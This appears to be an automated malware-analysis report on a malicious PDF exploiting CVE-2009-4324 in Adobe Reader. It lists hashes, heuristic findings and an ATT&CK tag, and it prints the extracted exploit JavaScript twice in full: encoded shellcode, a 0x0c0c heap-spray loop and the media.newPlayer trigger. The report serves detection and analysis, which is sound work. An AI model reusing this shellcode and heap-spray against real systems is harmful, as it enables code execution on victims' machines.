PDF malware analysis — malicious · d0c6cb2b494582a7

MALICIOUS

PDF

119.4 KB Created: 2009-07-08 10:53:46 +08:00 Authoring application: Acrobat Distiller 7.0 (Windows) First seen: 2026-05-11

MD5: d6a2c57078061b8a9254dae44e12f55d SHA-1: e2ca18af5adc73f915ee53ae4cce6a98a5bcec4c SHA-256: d0c6cb2b494582a74d77c92ba10fbcb5132d8f7bcbe35cacdcd7c1432eb0bd35

208 Risk Score

Malware Insights

MITRE ATT&CK

T1059.001 PowerShell

The PDF file was flagged as suspicious by an ML classifier with a very high score. It contains embedded JavaScript, which is a common technique for delivering malicious payloads. The presence of JavaScript actions and embedded JS streams suggests an attempt to execute arbitrary code. While no specific family is identified, the techniques used point towards a downloader or exploit delivery mechanism.

Machine Learning

Nyx PDF Classifier malicious score 0.9999

Heuristics 6

media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324

PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (matched in decompressed stream)
JavaScript action low 2 related findings PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Obfuscated multi-stage PDF JavaScript heap-spray exploit critical CVE related PDF_JS_OBFUSCATED_MULTISTAGE_HEAPSPRAY

PDF JavaScript hidden behind nested stream filters and/or a custom in-JS decoder (rolling-XOR stager) decodes to a heap-spray / ROP chain. The spray is only visible after unwinding those layers, which is why the raw heap-spray rules miss it. This is an obfuscated multi-stage Adobe Reader JavaScript exploit; the dropped Windows payload (often named Win.Trojan.Agent by signature AV) is the second stage, not the delivery mechanism.
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY

Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In PDF document text
- http://ns.adobe.com/pdf/1.3/In PDF document text
- http://ns.adobe.com/xap/1.0/In PDF document text
- http://purl.org/dc/elements/1.1/In PDF document text
- http://ns.adobe.com/xap/1.0/mm/In PDF document text
- http://ns.adobe.com/pdfx/1.3/In PDF document text

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`javascript_obj0017_000.js`	pdf-javascript-stream	PDF /JS object 17 at offset 0x4DA	3005 bytes
SHA-256: `8ae2b0c101457748ee3867e90b058dad3adbcbe2a705bf10655aaf2ba664bfee`
Preview script First 1,000 lines of the extracted script var unes if(app.version>11){while(1);} else{unes=unescape;} if(app.version<6){while(1);} var pGvRIJZpqdN = unes("%u4143%u494b%u11EB%u5BFC%u334B%u66C9%ub0B9%u8001%u0B34%uE2f9"+ "\x25\x75EBFA\x25\x75E805\x25\x75FFEB\x25\x75FFFF"+ "%uF911%uF9F9%uA3F9%u72AC%u7815%u9D15%uF9FD%u72F9"+ "%u110D%uF869%uF9F9%u0172%u1611%uF9F9%u70F9%u06FF"+ "%u91CF%u6254%u2684%uED11%uF9F8%u70F9%uF5BF%uCF06"+ "%uD091%u3FEB%u11AF%uF8FC%uF9F9%uBF70%u06E9%u91CF"+ "%uC5A0%u82FE%u0F11%uF9F9%u70F9%uEDBF%uCF06%u8791"+ "%u1B21%u118A%uF91E%uF9F9%uBF70%uCACD%u1230%u72FA"+ "%uC5B7%u387A%uA8FD%uF993%u06A8%uF5AF%u7AA0%u0601"+ "%u098D%uB9C4%uF9E6%u8FF9%u7010%uC5B7%uF993%uF993"+ "%uF993%uFB93%uF993%u8F06%u06C5%uE9AF%uBF70%u7ABD"+ "%uF901%u328D%uF993%uF993%uF993%uFD93%u8F06%u06BD"+ "%uEDAF%uBF70%u7AB1%uF901%u4C8D%uC178%uA9DC%uBFBD"+ "%uB772%u8CC5%u7854%uF941%uF9EB%uA9F9%uA99D%u8CBD"+ "%u7858%uFD41%uF9EB%u16F9%u1307%u8C57%u406C%uFFF9"+ "%uF9F9%u1578%uF1F9%uF9F9%uAEAF%u0972%u3F78%uEBE9"+ "%uF9F9%u3D72%u397A%u72F1%u0A01%u405D%uFFF9%uF9F9"+ "%uB0B0%uB0B0%uCD78%u17F1%u0707%u7C16%u8C30%uA608"+ "%u06A7%uC58F%u8F06%u06B1%uBD8F%u1906%uAFAC%u589D"+ "%uF9C9%uF9F9%u397C%uEA81%u72C7%uF5B9%u72C7%uE589"+ "%u72C7%uF1A7%uC754%u9172%u12F1%uC7F4%uB972%uC7CD"+ "%u5172%uF941%uF9F9%u22CA%u3C72%uA4A7%uFD3B%uAAF9"+ "%uAFAC%uCFAE%u9572%uE1DD%u72CF%uC5BC%u72CF%uFCAD"+ "%uFA81%uC72C%uB372%uC7E1%uA372%uFAD9%u1A24%uB0C5"+ "%u72C7%u72CD%u0CFA%u06CA%uCA05%u5539%u3DC3%uFE8D"+ "%u3638%uFAF4%u1201%uCF0B%u85C2%uEDDD%u268C%u3B72"+ "%u397A%uC7DD%uE172%u24FA%uC79F%uF572%uC7B2%uA372"+ "%uFAE5%uC724%uFD72%uFA72%u123C%uCAFB%u7239%uA62C"+ "%uA4A7%u3BA2%uF9F1%uF911%uF9F9%uA1F9%u397A%u3AFC"); var AKjtQExdzrASxZtHTFMSwNZfztONMZPULUqwGGdUSJSLxByMJtOdErPceyqDZbc = unes("\x25\x750\x630\x63\x25\x750\x630\x63"); var QVGaOwzwDZKwxGeQpKmiXsRvZHKaDZBUqJOJuDdrOdGFkfDFGeVdVDC = unes("\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c%u5a51%u4874%u5961%u6b71%u4772%u6a47%u4a73%u6247%u654b%u734b%u4858%u6371%u717a%u7672%u626e%u626e%u455a%u4243%u6764%u7646%u696b%u6a6e%u4e61%u6c6d%u7350%u5168%u7171%u5574"); while(AKjtQExdzrASxZtHTFMSwNZfztONMZPULUqwGGdUSJSLxByMJtOdErPceyqDZbc.length <= 32768) AKjtQExdzrASxZtHTFMSwNZfztONMZPULUqwGGdUSJSLxByMJtOdErPceyqDZbc+=AKjtQExdzrASxZtHTFMSwNZfztONMZPULUqwGGdUSJSLxByMJtOdErPceyqDZbc; AKjtQExdzrASxZtHTFMSwNZfztONMZPULUqwGGdUSJSLxByMJtOdErPceyqDZbc=AKjtQExdzrASxZtHTFMSwNZfztONMZPULUqwGGdUSJSLxByMJtOdErPceyqDZbc.substring(0,32768 - pGvRIJZpqdN.length); memory=new Array(); for(i=0;i<0x2000;i++) { memory[i]= AKjtQExdzrASxZtHTFMSwNZfztONMZPULUqwGGdUSJSLxByMJtOdErPceyqDZbc + pGvRIJZpqdN; } util["\x70\x72\x69\x6e\x74\x64"]("FGgITeSFZAjpOsSyXgoMbUZttCRxNEDbuZjH", new Date()); util["\x70\x72\x69\x6e\x74\x64"]("PAAhBAPMqrBpJVqRwqwcuxjWkEUEcZdEnvdP", new Date()); try {this.media["\x6e\x65\x77\x50\x6c\x61\x79\x65\x72"](null);} catch(e) {} util["\x70\x72\x69\x6e\x74\x64"](QVGaOwzwDZKwxGeQpKmiXsRvZHKaDZBUqJOJuDdrOdGFkfDFGeVdVDC, new Date());
`generic_stage_recovery_000.js`	deobfuscated-js	generic stage recovery split-literal-normalize from JavaScript object 17 at offset 0x4DA	2841 bytes
SHA-256: `2c4a665a4deb66f34492bfbba2277c48d49b6a19900d52a21580826c1da2480d`
Preview script First 1,000 lines of the extracted script var unes if(app.version>11){while(1);} else{unes=unescape;} if(app.version<6){while(1);} var pGvRIJZpqdN = unes("%u4143%u494b%u11EB%u5BFC%u334B%u66C9%ub0B9%u8001%u0B34%uE2f9%uEBFA%uE805%uFFEB%uFFFF%uF911%uF9F9%uA3F9%u72AC%u7815%u9D15%uF9FD%u72F9%u110D%uF869%uF9F9%u0172%u1611%uF9F9%u70F9%u06FF%u91CF%u6254%u2684%uED11%uF9F8%u70F9%uF5BF%uCF06%uD091%u3FEB%u11AF%uF8FC%uF9F9%uBF70%u06E9%u91CF%uC5A0%u82FE%u0F11%uF9F9%u70F9%uEDBF%uCF06%u8791%u1B21%u118A%uF91E%uF9F9%uBF70%uCACD%u1230%u72FA%uC5B7%u387A%uA8FD%uF993%u06A8%uF5AF%u7AA0%u0601%u098D%uB9C4%uF9E6%u8FF9%u7010%uC5B7%uF993%uF993%uF993%uFB93%uF993%u8F06%u06C5%uE9AF%uBF70%u7ABD%uF901%u328D%uF993%uF993%uF993%uFD93%u8F06%u06BD%uEDAF%uBF70%u7AB1%uF901%u4C8D%uC178%uA9DC%uBFBD%uB772%u8CC5%u7854%uF941%uF9EB%uA9F9%uA99D%u8CBD%u7858%uFD41%uF9EB%u16F9%u1307%u8C57%u406C%uFFF9%uF9F9%u1578%uF1F9%uF9F9%uAEAF%u0972%u3F78%uEBE9%uF9F9%u3D72%u397A%u72F1%u0A01%u405D%uFFF9%uF9F9%uB0B0%uB0B0%uCD78%u17F1%u0707%u7C16%u8C30%uA608%u06A7%uC58F%u8F06%u06B1%uBD8F%u1906%uAFAC%u589D%uF9C9%uF9F9%u397C%uEA81%u72C7%uF5B9%u72C7%uE589%u72C7%uF1A7%uC754%u9172%u12F1%uC7F4%uB972%uC7CD%u5172%uF941%uF9F9%u22CA%u3C72%uA4A7%uFD3B%uAAF9%uAFAC%uCFAE%u9572%uE1DD%u72CF%uC5BC%u72CF%uFCAD%uFA81%uC72C%uB372%uC7E1%uA372%uFAD9%u1A24%uB0C5%u72C7%u72CD%u0CFA%u06CA%uCA05%u5539%u3DC3%uFE8D%u3638%uFAF4%u1201%uCF0B%u85C2%uEDDD%u268C%u3B72%u397A%uC7DD%uE172%u24FA%uC79F%uF572%uC7B2%uA372%uFAE5%uC724%uFD72%uFA72%u123C%uCAFB%u7239%uA62C%uA4A7%u3BA2%uF9F1%uF911%uF9F9%uA1F9%u397A%u3AFC"); var AKjtQExdzrASxZtHTFMSwNZfztONMZPULUqwGGdUSJSLxByMJtOdErPceyqDZbc = unes("\x25\x750\x630\x63\x25\x750\x630\x63"); var QVGaOwzwDZKwxGeQpKmiXsRvZHKaDZBUqJOJuDdrOdGFkfDFGeVdVDC = unes("\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c%u5a51%u4874%u5961%u6b71%u4772%u6a47%u4a73%u6247%u654b%u734b%u4858%u6371%u717a%u7672%u626e%u626e%u455a%u4243%u6764%u7646%u696b%u6a6e%u4e61%u6c6d%u7350%u5168%u7171%u5574"); while(AKjtQExdzrASxZtHTFMSwNZfztONMZPULUqwGGdUSJSLxByMJtOdErPceyqDZbc.length <= 32768) AKjtQExdzrASxZtHTFMSwNZfztONMZPULUqwGGdUSJSLxByMJtOdErPceyqDZbc+=AKjtQExdzrASxZtHTFMSwNZfztONMZPULUqwGGdUSJSLxByMJtOdErPceyqDZbc; AKjtQExdzrASxZtHTFMSwNZfztONMZPULUqwGGdUSJSLxByMJtOdErPceyqDZbc=AKjtQExdzrASxZtHTFMSwNZfztONMZPULUqwGGdUSJSLxByMJtOdErPceyqDZbc.substring(0,32768 - pGvRIJZpqdN.length); memory=new Array(); for(i=0;i<0x2000;i++) { memory[i]= AKjtQExdzrASxZtHTFMSwNZfztONMZPULUqwGGdUSJSLxByMJtOdErPceyqDZbc + pGvRIJZpqdN; } util["\x70\x72\x69\x6e\x74\x64"]("FGgITeSFZAjpOsSyXgoMbUZttCRxNEDbuZjH", new Date()); util["\x70\x72\x69\x6e\x74\x64"]("PAAhBAPMqrBpJVqRwqwcuxjWkEUEcZdEnvdP", new Date()); try {this.media["\x6e\x65\x77\x50\x6c\x61\x79\x65\x72"](null);} catch(e) {} util["\x70\x72\x69\x6e\x74\x64"](QVGaOwzwDZKwxGeQpKmiXsRvZHKaDZBUqJOJuDdrOdGFkfDFGeVdVDC, new Date());

Open this report in the interactive analyzer, or submit your own file for analysis.